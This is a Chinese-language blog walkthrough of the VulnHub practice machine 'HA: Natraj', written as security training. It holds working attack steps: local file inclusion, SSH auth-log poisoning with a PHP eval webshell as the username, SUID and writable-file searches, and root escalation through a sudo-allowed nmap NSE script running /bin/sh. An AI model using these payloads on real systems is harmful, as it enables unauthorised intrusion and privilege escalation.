VulnHub靶场学习_HA: Natraj
HA: Natraj
Vulnhub靶场
下载地址:https://www.vulnhub.com/entry/ha-natraj,489/
背景:
Nataraj is a dancing avatar of Hindu God Shiva. His dance is called Tandava and it is only performed when he is most angry. Whoever interrupts his dance dies by Shiva while dancing. This is a Boot2Root challenge. Based on Nataraja. You only have to root the machine and find the root flag! All the best!


利用nmap扫UDP也没有发现开放的端口
目录扫描

在该路径下发现file.php
http://192.168.139.137/console/

打开试试,看看是不是文件包含
http://192.168.139.137/console/file.php?file=/var/www/html/index.html

http://192.168.139.137/console/file.php?file=/etc/passwd

获取到用户名,natraj、mahakal
接着利用cewl -m 4 192.168.139.137 >123.txt获取网站的信息
尝试SSH爆破,没有成功。
目前就只有这个文件包含是突破口,但也没有上传点。
Writeup,可以包含SSH的认证日志来Getshell
查看常见的log。

这里可以利用/var/log/auth.log对SSH用户名的记录来Getshell。
登陆SSH时,用户名为<?php phpinfo();?>

包含文件能够发现phpinfo()页面。

利用php一句话,用户名为<?php @eval($_POST['vul']);?>

这里利用蚁剑进行连接。

查找可利用的点
find / -user root -perm -4000 -print 2>/dev/null //查找suid
find / -perm -4000 2>dev/null | xargs ls -la //查找suid并详细展示
find / -writable -type d 2>/dev/null //查找当前权限可写的路径
find / -type f -perm 777 -exec ls -l {} \; 2>/dev/null //查找777文件
find / -writable -type f 2>/dev/null | grep -v "/proc/" |xargs ls -al |grep root //查找写权限文件

Apache2.conf拥有777权限。这里可以将上线的权限修改为natraj、mahakal 这两个用户,但不能修改为root,修改为root会导致apache起不来。而且要重启服务器,所以这个提权并不是特别好的。在前面的靶机HA: ARMOUR有遇到过。
修改/etc/apache2/apache2.conf的内容

这里低权限,只能重启服务器
重新获取shell,不过没有发现可以直接利用的,只能换个用户试试。

sudo -l 查看到有nmap的root权限

查看nmap的版本,旧版有交互可以直接执行系统命令,新版可以通过执行脚本。

echo 'os.execute("/bin/sh")' >vul.nse
sudo nmap -script=vul.nse

没能执行,这里判断是蚁剑不支持创建会话。
这里利用冰蝎成功提权。

成功获取到root下的flag。

VulnHub靶场学习_HA: Natraj的更多相关文章
- VulnHub靶场学习_HA: ARMOUR
		HA: ARMOUR Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-armour,370/ 背景: Klaw从“复仇者联盟”超级秘密基地偷走了一些盔甲 ... 
- VulnHub靶场学习_HA: InfinityStones
		HA-InfinityStones Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-infinity-stones,366/ 背景: 灭霸认为,如果他杀 ... 
- VulnHub靶场学习_HA: Avengers Arsenal
		HA: Avengers Arsenal Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-avengers-arsenal,369/ 背景: 复仇者联盟 ... 
- VulnHub靶场学习_HA: Chanakya
		HA-Chanakya Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-chanakya,395/ 背景: 摧毁王国的策划者又回来了,这次他创造了一个难 ... 
- VulnHub靶场学习_HA: Pandavas
		HA: Pandavas Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-pandavas,487/ 背景: Pandavas are the warr ... 
- VulnHub靶场学习_HA: Chakravyuh
		HA: Chakravyuh Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-chakravyuh,388/ 背景: Close your eyes a ... 
- VulnHub靶场学习_HA:Forensics
		HA:Forensics Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-forensics,570/ 背景: HA: Forensics is an ... 
- Vulnhub靶场题解
		Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ... 
- Vulnhub靶场——DC-1
		记一次Vulnhub靶场练习记录 靶机DC-1下载地址: 官方地址 https://download.vulnhub.com/dc/DC-1.zip 该靶场共有5个flag,下面我们一个一个寻找 打开 ... 
随机推荐
- 汉王JAVA笔试题
			汉王JAVA笔试题 1,jsp中动态include与静态include的区别? (1)动态包含总是会检查文件中的变化,适合用于包含动态页面,并且可以带参数. (2)静态包含不会检查所含文件的变化,适用 ... 
- 数据库04 /多表查询、pymysql模块
			数据库04 /多表查询.pymysql模块 目录 数据库04 /多表查询.pymysql模块 1. 笛卡尔积 2. 连表查询 2.1 inner join 内连接 2.2 left join 左连接 ... 
- 数据可视化基础专题(五):Pandas基础(四) 生成对象
			引言 先介绍下 Pandas 的数据结构,毕竟数据结构是万物的基础. Pandas 有两种主要的数据结构: Series 和 DataFrame 模块导入 首先我们在代码中引入 Pandas 和 Nu ... 
- javascript基础(三): 操作DOM对象(重点)
			DOM:文档对象模型 核心 浏览器网页就是一个Dom树形结构! 更新:更新Dom节点 遍历Dom节点:得到Dom节点 删除:删除一个Dom节点 添加:添加一个新的节点 要操作一个Dom节点,就必须要先 ... 
- python 生成器(一):生成器基础(一)生成器函数
			前言 实现相同功能,但却符合 Python 习惯的方式是,用生成器函数代替SentenceIterator 类.示例 14-5 sentence_gen.py:使用生成器函数实现 Sentence 类 ... 
- 02-flask项目创建及debug模式的开启
			一.flask文件的创建 打开pycharm,选择flask文件,选择相关配置,需要配置的有虚拟环境,flask文件名.如下图所示: 新建的flask文件如下所示: static:用来存放静态文件,包 ... 
- js dom演示
			<body> <div id="div1"> <p name="p1">p1内容</p> <p name= ... 
- Cyber Security - Palo Alto Firewall Objects Addresses, Services, and Groups(2)
			Users Objects and Groups Creating local user objects. Creating local user groups. https://docs.paloa ... 
- Python Ethical Hacking - Malware Analysis(3)
			Stealing WiFi Password Saved on a Computer #!/usr/bin/env python import smtplib import subprocess im ... 
- 设计模式:command模式
			目的:将命令设计成类的形式,并可以组织成队列 优点: 在需要的情况下,可以比较容易地将命令记入日志 可以容易的实现对请求的撤销和重做 由于新的具体命令类不影响其他的命令类,因此增加新的具体命令类很容易 ... 
